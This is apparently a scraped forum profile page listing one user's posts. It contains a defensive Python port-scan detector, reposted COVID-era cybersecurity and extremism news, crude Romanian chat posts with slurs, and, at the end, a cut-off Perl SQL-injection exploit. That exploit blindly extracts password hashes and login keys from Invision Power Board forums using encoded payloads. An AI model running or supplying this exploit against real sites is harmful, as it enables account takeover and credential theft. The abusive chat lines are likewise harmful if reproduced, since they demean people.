attacker_ip_set=set() priv24 = re.compile("^10\.\d{1,3}\.\d{1,3}\.\d{1,3}$") priv20 = re.compile("^192\.168\.\d{1,3}.\d{1,3}$") priv16 = re.compile("^172.(1[6-9]|2[0-9]|3[0-1]).[0-9]{1,3}.[0-9]{1,3}$") recon_log="ReconLog.txt" pcap_file="ReconPcap.pcap" max_log_sz=1024.0 #1MB default log and pcap file size limit service_scan_win_sz=65535 #Detect -A scan ip_proto_scan_lst=[] #Detect -sO scan scan_detect_lst=[] #Deal with OS and scans like FIN,NUL,XMAS #Enforce run as admin. def isAdmin(): try: is_admin = (os.getuid() == 0) except AttributeError: is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if not is_admin: print("[!] Run me from an elevated command line.") exit() #Check FW rules exist. def getFirewall_rules(IP): global OS try: if OS=="win32": CMD="netsh advfirewall firewall show rule name=ReconInformer_"+IP+" verbose" else: CMD="iptables -L INPUT -v -n" net=Popen(CMD, shell=True, stderr=PIPE, stdout=PIPE ) output, errors = net.communicate() if IP in output: return True else: return False except Exception as e: pass return False #Block IP in-bound, allow out. def firewall_ip(ip): global OS try: if OS=="win32": if not getFirewall_rules(IP): os.system("netsh advfirewall firewall add rule name=ReconInformer_"+ip+" dir=in interface=any action=block remoteip="+ip+ ">nul 2>&1") else: #Block ANY new in-bound connection but allow outbound. if not getFirewall_rules(IP): os.system("iptables -A INPUT -s "+ip+" -m state --state NEW -j DROP") except Exception as e: print(str(e)) #Delete FW rules. def rem_firewall_rule(ip_lst): global OS try: for addr in ip_lst: time.sleep(0.3) if is_ip_private(addr): CMD="netsh advfirewall firewall delete rule name=ReconInformer_"+addr if OS!="win32": CMD="iptables -D INPUT -s "+addr+" -m state --state NEW -j DROP" if getFirewall_rules(addr): os.system(CMD) print(colored.cyan("[!] deleted fw rule: ReconInformer_"+addr)) time.sleep(2) else: print(colored.cyan("[!] Firewall rule: ReconInformer_"+addr+" does not exist.")) else: print(colored.cyan("[!] Invalid or non private ip-address.")) sys.stdout.flush() except Exception as e: print(str(e)) def valid_ip(addr): try: socket.inet_aton(addr) return True except socket.error: return False #Never block on specified hosts def whitelist(): global whitelist_conf, ip_whitelist if os.path.exists(whitelist_conf): if os.stat(whitelist_conf).st_size == 0: print(colored.cyan("[!] Recon_Whitelist.txt is empty.")) exit() wl=open(whitelist_conf, "r") for ip in wl: ip = ip.strip() if not valid_ip(ip): print(colored.cyan("[!] Invalid IP: "+ip)) else: #Check IP is in LAN range. if is_ip_private(ip): ip_whitelist.add(ip) else: print(colored.cyan("[!] Non private IP(s) will not be added: "+ip)) print(colored.cyan("[-] Whitelisting: ")+colored.green(ip)) time.sleep(0.1) wl.close() print("\n") else: print(colored.cyan(whitelist_conf+" does not exist.")) exit() sys.stdout.flush() #Disk write chk. def getsize(log_file): sz=0 try: if os.path.exists(log_file): sz = round(os.path.getsize(log_file)/float(1<<10)) except Exception as e: pass return sz def log(data): global recon_log, max_log_sz try: if getsize(recon_log) < max_log_sz: f=open(recon_log,"a") f.write(data+"\r\n") f.close() else: print(colored.cyan("[!] Log size of "+str(max_log_sz)+" limit reached, logging stopped.")) sys.stdout.flush() except Exception as e: pass def detection_time(): recon_time = str(datetime.now()) recon_time = recon_time.replace(":","-").replace(" ","_") return recon_time #Filter. def capture_filter(udp_capture, ping_sweep): global local_ip_address HOST="(dst net "+local_ip_address+")" WINDOW_SZ="tcp[14:2]==1024||tcp[14:2]==2048||tcp[14:2]==3072||tcp[14:2]==4096||tcp[14:2]==29200||tcp[14:2]==5840||tcp[14:2]==8192||tcp[14:2]==64240" SYN_SCAN="tcp[13]==2 && tcp[13]!=16" NULL_SCAN="tcp[13]==0" XMAS="tcp[13] & 1!=0 && tcp[13] & 32!=0 && tcp[13] & 8!=0" SCTP="sctp" FRAG="ip[6] = 32 or icmp[1]==4" ICMP="icmp" ARP="arp[6:2]==1" #opcode 1 (request) or 2 (reply). if udp_capture and not ping_sweep: return (HOST+"&&"+SYN_SCAN+"||"+XMAS+"||"+NULL_SCAN+"||"+WINDOW_SZ+"||"+SCTP+"||"+"udp"+"&&"+"dst net "+local_ip_address) elif udp_capture and ping_sweep: return (HOST+"&&"+SYN_SCAN+"||"+XMAS+"||"+NULL_SCAN+"||"+WINDOW_SZ+"||"+SCTP+"||"+ARP+"||"+"udp"+"&&"+"dst net "+local_ip_address) elif ping_sweep: return (HOST+"&&"+SYN_SCAN+"||"+XMAS+"||"+NULL_SCAN+"||"+WINDOW_SZ +"||"+SCTP+"||"+ICMP+"||"+FRAG+"||"+ARP+"&&"+"dst net "+local_ip_address) else: return (HOST+"&&"+SYN_SCAN+"||"+XMAS+"||"+NULL_SCAN+"||"+WINDOW_SZ +"||"+SCTP+"||"+ICMP+"||"+FRAG+"&&"+"dst net "+local_ip_address) #Private ip range. def is_ip_private(ip): global priv24,priv20,priv16 res = priv24.match(ip) or priv20.match(ip) or priv16.match(ip) return res is not None def fw_block_inbound(addr): fw_rules = getFirewall_rules(addr) if not fw_rules and addr in ip_whitelist: return colored.cyan("[!] Machine whitelisted.") elif not fw_rules and addr not in ip_whitelist: #Extra network range check if is_ip_private(addr): firewall_ip(addr) return colored.cyan(colored.magenta("[+] Blocking IP: "+addr)) else: return colored.cyan("[!] "+addr+" is blocked at the Firewall.") sys.stdout.flush() def save_pcap(pkt): global pcap_file, max_log_sz if getsize(pcap_file) < max_log_sz: try: wrpcap(pcap_file, pkt, append=True) except Exception as e: pass else: print(colored.cyan("[!] Pcap size of "+str(max_log_sz)+" limit reached, pcap not saved.")) sys.stdout.flush() def restore_console(): global recon_win, OS if recon_win and OS=="win32": #Restore console if minimized try: recon_win.restore() except Exception as e: pass def doit(pkt): global local_ip_address, _args, attacker_ip_set, ip_proto_scan_lst, OS, recon_win global gw, no_report_scan_list, dst_port_whitelist, scan_detect_lst SCAN_TYPE="" scan_flags="" service_scan="" fragmented=False addr="" dest="" mac="" pnum="" lines=60 #Deal with ping sweep -sn -sP try: if pkt.haslayer(ARP): addr = str(pkt[ARP].psrc) mac = str(pkt[Ether].src) print(colored.red("[+] Recon:"+" "*(len("ARP Ping sweep")-1)+"IP:"+" "*(len(addr)+2)+"MAC:"+" "*(len(mac)+1))) print(colored.cyan("[*] ARP Ping sweep" +" | " + addr + " | " + str(mac))) print(colored.red("-"*lines)) sys.stdout.flush() #IP layer, LAN and Check Target if IP not in pkt or not is_ip_private(pkt[0][IP].src) or pkt[0][IP].dst != local_ip_address: return #Ping if str(pkt.haslayer(ICMP)): if str(pkt.getlayer(ICMP).type) == "8": print(colored.cyan("[*] Ping detected from: "+pkt[0][IP].src)) print(colored.red("-"*lines)) sys.stdout.flush() except Exception as e: pass #Handle fragmented packets -f if str(pkt[0][IP].flags)=="MF": fragmented=True try: dest=str(pkt[0][IP].dst) addr=str(pkt[0][IP].src) mac=str(pkt[Ether].src) pnum=str(pkt[IP].dport) win_sz = pkt[0][IP].window #Skip ignored hosts or filtered dest ports. if addr in no_report_scan_list or pnum in dst_port_whitelist: return except Exception as e: pass #Report fragmented packets -f. if fragmented==True: SCAN_TYPE="Fragmented" try: if pnum != "": print(colored.red("[+] Recon:"+" "*(len("Fragmented")-1)+"IP:"+" "*(len(addr)+2)+"MAC:"+" "*(len(mac)+1)+"Port: ")) print(colored.cyan("[*] Fragmented" +" | " + addr + " | " + str(mac)+ " | " + pnum)) else: print(colored.red("[+] Recon:"+" "*(len("Fragmented")-1)+"IP:"+" "*(len(addr)+2)+"MAC:"+" "*(len(mac)+1))) print(colored.cyan("[*] Fragmented" +" | " + addr + " | " + str(mac))) print(colored.red("-"*lines)) sys.stdout.flush() except Exception as e: pass if _args.block_mode: print(fw_block_inbound(addr)) if _args.log_probe: info = "Source: " +addr + " | " + "Dest: "+dest + " | " + mac + " | " + "Fragmented packet | " + detection_time() log(info) if _args.archive: save_pcap(pkt) if recon_win and OS=="win32": restore_console() return #Noisy port if OS == "win32" and pnum == "2869": print(colored.cyan("[!] Port 2869 MS UPNP noise?, see -f flag")) sys.stdout.flush() #Noisy port if pnum == "7680": print(colored.cyan("[!] Port 7680 MS WUDO noise?, see -f flag")) sys.stdout.flush() if UDP in pkt[0]: SCAN_TYPE = "UDP" if TCP in pkt: try: flags = str(pkt[0][TCP].flags) options = str(pkt[0][TCP].options) if (flags=="S" or pkt[0][TCP].flags==0x002) and len(flags)==1: SCAN_TYPE = "SYN" #Handle useful --scanflags 0 - 255 if (flags=="SP") or (pkt[0][TCP].flags==0x00a) and len(flags)==2: SCAN_TYPE = "SYN" scan_flags="SYN, PSH" if (flags=="SU") or (pkt[0][TCP].flags==0x022) and len(flags)==2: SCAN_TYPE = "SYN" scan_flags = "SYN, URG" if (flags=="SPU") or (pkt[0][TCP].flags==0x02a) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG" if (flags=="SE") or (pkt[0][TCP].flags==0x42) and len(flags)==2: SCAN_TYPE = "SYN" scan_flags = "SYN, ECN" if (flags=="SPE") or (pkt[0][TCP].flags==0x04a) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, ECN" if (flags=="SUE") or (pkt[0][TCP].flags==0x062) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, URG, ECN" if (flags=="SPUE") or (pkt[0][TCP].flags==0x06a) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG, ECN" if (flags=="SC") or (pkt[0][TCP].flags==0x082) and len(flags)==2: SCAN_TYPE = "SYN" scan_flags = "SYN, CWR" if (flags=="SPC") or (pkt[0][TCP].flags==0x08a) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, CWR" if (flags=="SUC") or (pkt[0][TCP].flags==0x0a2) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, URG, CWR" if (flags=="SPUC") or (pkt[0][TCP].flags==0x0a2) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG, CWR" if (flags=="SPUC") or (pkt[0][TCP].flags==0x0aa) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG, CWR" if (flags=="SEC") or (pkt[0][TCP].flags==0x0c2) and len(flags)==3: SCAN_TYPE = "SYN" scan_flags = "SYN, ECN, CWR" if (flags=="SPEC") or (pkt[0][TCP].flags==0x0ca) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, ECN, CWR" if (flags=="SUEC") or (pkt[0][TCP].flags==0x0e2) and len(flags)==4: SCAN_TYPE = "SYN" scan_flags = "SYN, URG, ECN, CWR" if (flags=="SPUEC") or (pkt[0][TCP].flags==0x0ea) and len(flags)==5: SCAN_TYPE = "SYN" scan_flags = "SYN, PSH, URG, ECN, CWR" #Handle -A Service scans. if (flags=="SE" or pkt[0][TCP].flags==0x042) and len(flags)==2: #We can miss detects from old systems unless hits port 135/139 (Win OS). service_scan="Service Scan -A" if (flags=="SEC" or pkt[0][TCP].flags==0x8c2) and len(flags)==3: service_scan="Service Scan -A" if (flags=="FSPU" or pkt[0][TCP].flags==0x02b) and len(flags)==4: service_scan="Service Scan -A" if win_sz == service_scan_win_sz: service_scan="Service Scan -A" if (flags=="S" or pkt[0][TCP].flags==0x002) and len(flags)==1 and len(options)>15: SCAN_TYPE = "CONNECT" lines=58 #FW scan -sA if (flags=="A" or pkt[0][TCP].flags==0x010) and len(flags)==1: SCAN_TYPE = "ACK" if "F" in scan_detect_lst or OS != "win32": if (flags=="F" or pkt[0][TCP].flags==0x001) and len(flags)==1: SCAN_TYPE = "FIN" if "N" in scan_detect_lst or OS != "win32": if (flags=="" or pkt[0][TCP].flags==0x000) and len(flags)==0: SCAN_TYPE = "NULL" if "X" in scan_detect_lst or OS != "win32": if (flags=="FPU" or pkt[0][TCP].flags==0x029) and len(flags)==3: SCAN_TYPE = "XMAS" if "M" in scan_detect_lst or OS != "win32": if (flags=="FA" or pkt[0][TCP].flags==0x011) and len(flags)==2: SCAN_TYPE = "MAIMON" lines=58 except Exception as e: pass else: try: if IP in pkt: if "SCTP": if (str(pkt[0][IP].flags)=="" or pkt[0][IP].flags == 0) and pkt[0][IP].len==52 and pkt[0][IP].type==1: SCAN_TYPE = "SCTP" if "SCTP_COOKIE_ECHO": if (str(pkt[0][IP].flags)=="" or pkt[0][IP].flags==0) and pkt[0][IP].type==10: SCAN_TYPE = "SCTP_COOKIE_ECHO" lines=69 except Exception as e: pass #Bail if no scan type. if SCAN_TYPE=="": return #Try detect IP Protocol scan, not full proof as consecutive ACK, SCTP packets will be flagged. if SCAN_TYPE=="ACK" or SCAN_TYPE=="SCTP" and len(ip_proto_scan_lst) < 2: #Don't add same scan type twice. if SCAN_TYPE not in ip_proto_scan_lst: ip_proto_scan_lst.append(SCAN_TYPE) if len(ip_proto_scan_lst)==2: print(colored.cyan("[*] Possible IP Protocol Scan -sO")) sys.stdout.flush() #Reset the list. ip_proto_scan_lst=[] #Clear any old one off ACK or SCTP scan flags hanging around. elif SCAN_TYPE != "ACK" or SCAN_TYPE != "SCTP": ip_proto_scan_lst=[] print(colored.red("[+] Recon:"+" "*(len(SCAN_TYPE)-1)+"IP:"+" "*(len(addr)+2)+"MAC:"+" "*(len(mac)+1)+"Port: ")) print(colored.green("[+] "+SCAN_TYPE + " | " + addr + " | " + str(mac) + " | " + pnum)) if scan_flags != "": print(colored.cyan("[*] --scanflags "+scan_flags)) if service_scan != "": print(colored.cyan("[*] "+service_scan)) if _args.block_mode: print(fw_block_inbound(addr)) if addr not in attacker_ip_set: attacker_ip_set.add(addr) if len(attacker_ip_set) >= 2: print(colored.cyan("[!] Multiple hosts detected, possible -D decoy scan.")) attacker_ip_set=set() print(colored.red("-"*lines)) sys.stdout.flush() #Log if _args.log_probe: try: info = ("Source: "+ addr + " | " + "Dest: "+local_ip_address+" | "+SCAN_TYPE+" | "+ "MAC: "+str(pkt[0][Ether].src)+" | "+ "Port: " + str(pkt[0][IP].dport)+" | "+detection_time()) if scan_flags != "": info = info + " | " + "--scanflags: " + scan_flags elif service_scan != "": info = info + " | " + service_scan elif scan_flags != "" and service_scan != "": info = info + " | " + "--scanflags: " + scan_flags + " | " + service_scan except Exception as e: pass finally: log(info) #Save PCAP if _args.archive: save_pcap(pkt) #Restore console if recon_win and OS=="win32": restore_console() def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--ip_addr", required=True, help="<ATTACKER-IP-ADDR>.") parser.add_argument("-b", "--block_mode", nargs="?", const="1", help="Block IP at Firewall, default block any in-bound, allow out.") parser.add_argument("-d", "--delete_fw", help="Unblock firewalled IP(s) <-d host1, host2>.") parser.add_argument("-u", "--udp", nargs="?", const="1", help="UDP capture.") parser.add_argument("-s", "--scan_type", help="Report non-workable anomalous (on Windows OS) scan types XMAS,FIN,NULL,MAIMON <-s X, F, N, M>.") parser.add_argument("-p", "--ping_sweep", nargs="?", const="1", help="Detect ping sweeps -sP, -sn, may fail if -Pn is used in the scan.") parser.add_argument("-f", "--filter_dst_port", help="Filter dest ports <-f 53,137,161,2869,..> reduce noise NBNS, DNS etc.") parser.add_argument("-w", "--whitelist", nargs="?", const="1", help="Whitelist IP from FW block.") parser.add_argument("-n", "--no_report", help="Ignore packets from server <-n host1, host2>.") parser.add_argument("-r", "--restore_console", nargs="?", const="1", help="Restores console window if minimized (Window only).") parser.add_argument("-a", "--archive", nargs="?", const="1", help="Save PCAP (appends to pcap) size limit 1MB.") parser.add_argument("-l", "--log_probe", nargs="?", const="1", help="Log detected probes (appends log) size limit set at 1MB.") return parser.parse_args() #Ensure module exists def haslib(lib): if not lib in (name for loader, name, ispkg in iter_modules()): print("[!] "+lib+ " does not exist, pip install "+lib) exit() return True #Try deal with known bugs in some scapy versions so people don't lose their minds. def scapy_ver(): ver = pkg_resources.get_distribution("scapy").version if ver=="2.4.1" or ver=="2.4.2": print("[!] Known bugs in scapy versions 2.4.1 and 2.4.2") print("[!] Scapy version detected is " +ver+" update to 2.4.3 or latest.") return False return True def recon_init(udp, ping_sweep): while True: try: sniff(filter = capture_filter(udp, ping_sweep), prn=doit, count=10, store=0) time.sleep(1) except Exception as e: pass def main(args): global _args, local_ip_address, OS, block_ip, recon_log, dst_port_whitelist global pcap_file, recon_win, gw, no_report_scan_list, scan_detect_lst if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) #Assign args to global var to ref in other functions. _args = args print(colored.red("[*] Packets can be forged.")) print(colored.red("[*] False positives may occur.")) print(colored.red("[*] Attackers need protection too.")) print(colored.red("[*] Anything can be bypass, use at own risk.")) print(colored.red("[/] Listening...\n")) sys.stdout.flush() _os = sys.platform if _os!="win32": OS="Linux" recon_win=False dst_port_whitelist="" no_report_scan_list="" src_port_whitelist="" if OS=="win32": ctypes.windll.kernel32.SetConsoleTitleA("Recon-Informer v1") else: sys.stdout.write(b'\33]0;Recon-Informer v1\a') sys.stdout.flush() if args.restore_console and OS=="win32": try: import pygetwindow as gw recon_win = gw.getWindowsWithTitle("Recon-Informer v1")[0] except Exception as e: pass elif args.restore_console and OS!="win32": print(colored.cyan("[!] Skipped -r Windows only.")) if args.ip_addr: if not valid_ip(args.ip_addr): print(colored.cyan("[!] Invalid IP.")) exit() else: local_ip_address=args.ip_addr if args.block_mode: print(colored.cyan("[!] Warning -b, spoofing can DoS in-bound.")) if not args.whitelist: print(colored.cyan("[!] No whitelist, all IPs blocked.")) if args.udp: print(colored.cyan("[!] udp equals more noise, see -f or -n flags.")) if args.ping_sweep: print(colored.cyan("[!] I see your using -p, most Nmap scans start with ARP anyway.")) if args.filter_dst_port: dst_port_whitelist=args.filter_dst_port.upper().split(",") if OS=="win32" and args.scan_type: scan_detect_lst=args.scan_type.upper().split(",") elif OS != "win32" and args.scan_type: print(colored.cyan("[!] Ignoring -s flag, Non Windows OS.")) if OS=="win32" and len(scan_detect_lst)==0: print(colored.cyan("[!] FIN,NULL,XMAS,MAIMON scans are ignored on Windows")) print(colored.cyan("[!] Still wish to detect them? use -s flag, see -h.")) if args.whitelist and not args.block_mode: print(colored.cyan("[!] -w has no block mode (-b).")) exit() if args.block_mode and args.whitelist: whitelist() if args.no_report: no_report_scan_list=args.no_report.split(",") if args.log_probe: if os.path.exists(recon_log): if round(os.path.getsize(recon_log)/float(1<<10)) >= max_log_sz: print(colored.cyan("[!] Log file size of "+str(max_log_sz)+" limit reached, delete log file to continue logging.")) exit() if args.archive: if os.path.exists(pcap_file): if round(os.path.getsize(pcap_file)/float(1<<10)) >= max_log_sz: print(colored.cyan("[!] PCAP file size of "+str(max_log_sz)+" limit reached, delete pcap to continue saving.")) exit() if args.delete_fw: rem_firewall_rule(args.delete_fw.split(",")) #Listen for recon attempts. recon_init(args.udp, args.ping_sweep) if __name__=="__main__": isAdmin() try: if haslib("scapy"): from scapy.all import * scapy_ver() except Exception as e: if str(e) == "cannot import name NPCAP_PATH": scapy_ver() try: if haslib("clint"): from clint.textui import colored except Exception as e: print(str(e)) try: print(colored.red(BANNER)) time.sleep(0.2) sys.stdout.flush() except Exception as e: print(str(e)) parser = argparse.ArgumentParser() if len(sys.argv)==1: parser.print_help(sys.stderr) exit() main(parse_args()) Source
  11. Kev

    COVID-19

    hecarilor v-ati gandit vreodata ca poate fi o alta specie care ne invadeaza, cum am invadat si noi dinozaurii?
  12. Apply pressure to any system – and its weakness become apparent. COVID-19 has exerted the necessary pressure to test cybersecurity postures, exposing gaps – some of them yawning, some more subtle – as entire workforces have been ordered to work from home. As the novel coronavirus escaped the confines of China earlier this year and it became increasingly clear large numbers of workers would have to hunker down at home, all eyes turned to an obvious potential weak spot – VPNs, which would surely sputter under the stress. But as the virus spread it has exposed additional security problems, ranging from the inability to do forensic tests and general upkeep on systems to granter higher level user privileges to staff to access systems remotely. Organizations which previously did not have a distributed workforce quickly learned their tools on hand were not designed or intended to work safely offsite, via a VPN or over the internet, said Lisa Davies, head of corporate security at Redox, preventing security and IT teams from conducting even routine, but important, tasks. “Since many of the security controls and tools used by non-distributed companies depend on being on the local network, they cannot do [many] things remotely,” Davies said. “These companies have found it more difficult to update, monitor logs etc unless the device is on the local network, so when employees take them home, they are in the dark.” Company equipment left behind as workers fled has languished unmonitored, their vulnerability magnified as employees, outside the sight lines of security teams, connect their own, unsecure devices to company assets. Organizations must “monitor inactive company devices, as possible indicators a device has an issue, or a remote worker may be tempted to use personal technology,” said Davies. “This goes hand-in-hand with technical controls preventing non-company devices from accessing sensitive information.” The new working order has cast a harsh light on the limitations and safeguards of connectivity, required for business to function. Existing protocols simply are not sufficient, said Luke Willadsen, security consultant, cybersecurity services and solutions firm EmberSec. It appears support for multifactor authentication has been a lot of talk and not quite as much action. Many companies apparently haven’t required it to connect to the network then disable the work computer’s ability to take a screenshot of the window containing the remote/virtual desktop on the host computer, Willadsen said. That needs to change quickly. “Don’t let any data pass between the machine originating the connection and the remote/virtual desktop,” Willadsen said. Security teams can bridge this gap by disabling “the clipboard and shared drive access between the origination host and the virtual/remote system,” he said, noting “we don’t want a single byte of information to be exchanged between the two hosts (aside from the network connection that facilitates the session).” That will prevent “the introduction of malware into your network and it prevents employees from exfiltrating confidential or proprietary files,” he said. Pre-coronavirus, supervisors didn’t have to concern themselves with employee distractions – children running around, barking dogs, fears of a deadly virus’s spread or many other things occurring in a normal household. But now, employ focus is paramount. Workers be reminded to stay focused and that security policies put in place to protect corporate information are still in place, especially in a world filled with phishing emails designed to prey on those now operating in a busy and confusing world. “They should also build mechanisms to reinforce such policies in the moment they most need to followed – for example within the context of an email asking for financial action or confidential information – so that users can make informed decisions before interacting with suspicious emails,” said Matt Petrosky, vice president of customer experience, GreatHorn. By providing employees with reminders about policies when it matters, companies can significantly reduce risk for their remote workforce.” Via
      • 1
      • Upvote
  13. The bulletin notes there is "no information" yet on specific plots. A Department of Homeland Security memo sent to law enforcement officials around the country warns that violent extremists could seek to take advantage of the COVID-19 pandemic by carrying out attacks against the U.S. according to the intelligence bulletin, compiled by the agency's Counterterrorism Mission Center and Countering Weapons of Mass Destruction Office. At this time, DHS said it has but that it has observed certain extremist groups, both foreign and domestic, looking to spread misinformation about the coronavirus. The memo, which was circulated on Monday, comes after assurances from FBI Director Chris Wray in a video message that agents would be even more vigilant in monitoring threats to the U.S. as the virus spreads. Wray said. "Because our criminal and national security adversaries sure aren't going to take a day off -- whether that's for the coronavirus or, for that matter, anything else." Among the activities by extremist organizations cited in the DHS bulletin is a clipping from a weekly ISIS newsletter, which called for supporters to carry out attacks against overburdened health care systems in various Western countries. Another portion of the bulletin singles out activity by white supremacists online who the DHS says have ABC News reported on Monday on an alert from the FBI's New York field office that showed intelligence gathered on racist extremist groups, including neo-Nazis, that were encouraging followers who contract COVID-19 to spread the disease to Jewish people and police officers. Via
      • 1
      • Upvote
  14. Kev

    COVID-19

    Pai si eu de unde stiu ca nu arunc pe fereastra $6,499 + $30k+?
  15. Kev

    COVID-19

    Daca maine scoate Tefal promotie la tigaie, uita toata lumea de virusul vietii
  16. Kev

    COVID-19

    si mie imi place cum ai sa mori de foame ca am inchise cateva brutării
  17. Kev

    COVID-19

    Vezi ca ma jignesti, nici nu stii cu cine vorbesti
  18. Some map-based applications that trace the path of the virus across the globe could end up infecting a user’s phone with a virus, the digital kind that is. Spam documents that offer information about the virus through emails and message attachments are also increasing, cyber security firms said. Mumbai | Pune: Web and mobile applications that track the spread of the Covid-19 virus outbreak are also loading ransomware trojans and trackers to snoop on users, according to cyber security firms. For instance, some map-based applications that trace the path of the virus across the globe could end up infecting a user’s phone with a virus, the digital kind that is. Spam documents that offer information about the virus through emails and message attachments are also increasing, the firms said. Information security provider ZScaler said that hackers were now floating applications on the internet that claim to notify a user as soon as anyone infected with the virus is nearby. What such apps do instead is lock out the user and ask for ransoms to unlock their device. IT security company Lookout also found a ‘Corona live 1.1’ Android application which is a Trojanised version of the legitimate “corona live” app that allows users to get updated with data found on Johns Hopkins University’s coronavirus tracker. Via
  19. Kev

    COVID-19

    Bre, sunt fumator de aprox 15 ani, tusesc de ma priveste lumea de zici ca am pojar, imi servetel nu am treaba, am codul civic, in opinia mea si referitor la titlu threadului, mi se pare absurd ce se vehiculeaza /am aprox 500k pe instagram, nimeni nu discuta //facebook idem, e full de coroana vietii
  20. Kev

    COVID-19

    nu, asta era si ideea "daca presedintele e poponar, te futi in cur si tu?" sa moara, oricum mor dun prostie, panica, etc.. si TV
  21. Kev

    COVID-19

    bullshit, de nu stiai filozof ramaneai voi mai mult promovati /stiu cateva sute de cazuri de mortaciuni de la etnobotanice si nu s-a mai plans nimeni //mor milioane de oameni in fiecare zi ///Becali sanchi "a donat" 30 de mii pentru o fabrica de textile ca sa faca masti, cand defapt a cumparat-o ca nu e prost sa iasa in pierdere, dar asta nu se mai vede pe TV
  22. Kev

    COVID-19

    Nu e man asta, este doar un test cum a spui si Andrei pe Facebook, nu retin si nu deschid telefonul, a aparut corona mortii versiunea 2
  23. Kev

    COVID-19

    scuze de dublu post grije la buzunare, sunt gata sa va arda, manusi, masti, ochelari cu geamuri negrii, nu tu martori, grije
  24. SQL Injection Exploit !/usr/bin/perl ## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX ## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4) ## tested on version 1 Final and version 3.1.4 ## * work on all mysql versions ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On) ## (c)oded by 1dt.w0lf ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## screen: ## ~~~~~~~ ## r57ipb3.pl blah.com /ipb13/ 1 0 ## [~] SERVER : blah.com ## [~] PATH : /ipb13/ ## [~] MEMBER ID : 1 ## [~] TARGET : 0 - IPB 1.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99 ## ## r57ipb3.pl blah.com /ipb314/ 1 1 ## [~] SERVER : blah.com ## [~] PATH : /ipb314/ ## [~] MEMBER ID : 1 ## [~] TARGET : 1 - IPB 2.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d ## ## r57ipb3.pl blah.com /ipb314/ 1 1 ## [~] SERVER : blah.com ## [~] PATH : /ipb314/ ## [~] MEMBER ID : 1 ## [~] TARGET : 1 - IPB 3.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ use IO :: Socket ; if (@ ARGV < 4 ) { & usage ; } $server = $ARGV [ 0 ]; $path = $ARGV [ 1 ]; $member_id = $ARGV [ 2 ]; $target = $ARGV [ 3 ]; $pass = ( $target )?( 'member_login_key' ):( 'password' ); $server =~ s !( http :\/\/)!!; $request = 'http://' ; $request .= $server ; $request .= $path ; $s_num = 1 ; $|++; $n = 0 ; print "[~] SERVER : $server \r\n" ; print "[~] PATH : $path \r\n" ; print "[~] MEMBER ID : $member_id \r\n" ; print "[~] TARGET : $target " ; print (( $target )?( ' - IPB 3.*' ):( ' - IPB 2.*' ):( ' - IPB 1.*' )); print "\r\n" ; print "[~] SEARCHING PASSWORD ... [|]" ; ( $cmember_id = $member_id ) =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ; while( 1 ) { if(& found ( 47 , 58 )== 0 ) { & found ( 96 , 122 ); } $char = $i ; if ( $char == "0" ) { if( length ( $allchar ) > 0 ){ print qq {\ b \ b DONE ] MEMBER ID : $member_id }; print (( $target )?( 'MEMBER_LOGIN_KEY : ' ):( 'PASSWORD : ' )); print $allchar . "\r\n" ; } else { print "\b\b FAILED ]" ; } exit(); } else { $allchar .= chr ( 42 ); } $s_num ++; } sub found ($$) { my $fmin = $_ [ 0 ]; my $fmax = $_ [ 1 ]; if (( $fmax - $fmin )< 5 ) { $i = crack ( $fmin , $fmax ); return $i ; } $r = int ( $fmax - ( $fmax - $fmin )/ 2 ); $check = " BETWEEN $r AND $fmax " ; if ( & check ( $check ) ) { & found ( $r , $fmax ); } else { & found ( $fmin , $r ); } } sub crack ($$) { my $cmin = $_ [ 0 ]; my $cmax = $_ [ 1 ]; $i = $cmin ; while ( $i < $cmax ) { $crcheck = "= $i " ; if ( & check ( $crcheck ) ) { return $i ; } $i ++; } $i = 0 ; return $i ; } sub check ($) { $n ++; status (); $ccheck = $_ [ 0 ]; $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D" ; $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28" ; $pass_hash3 = $pass . "," . $s_num . ",1))" . $ccheck . ") /*" ; $pass_hash3 =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ; $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20" ; $socket = IO :: Socket :: INET -> new ( Proto => "tcp" , PeerAddr => " $server " , PeerPort => "80" ); printf $socket ( "GET 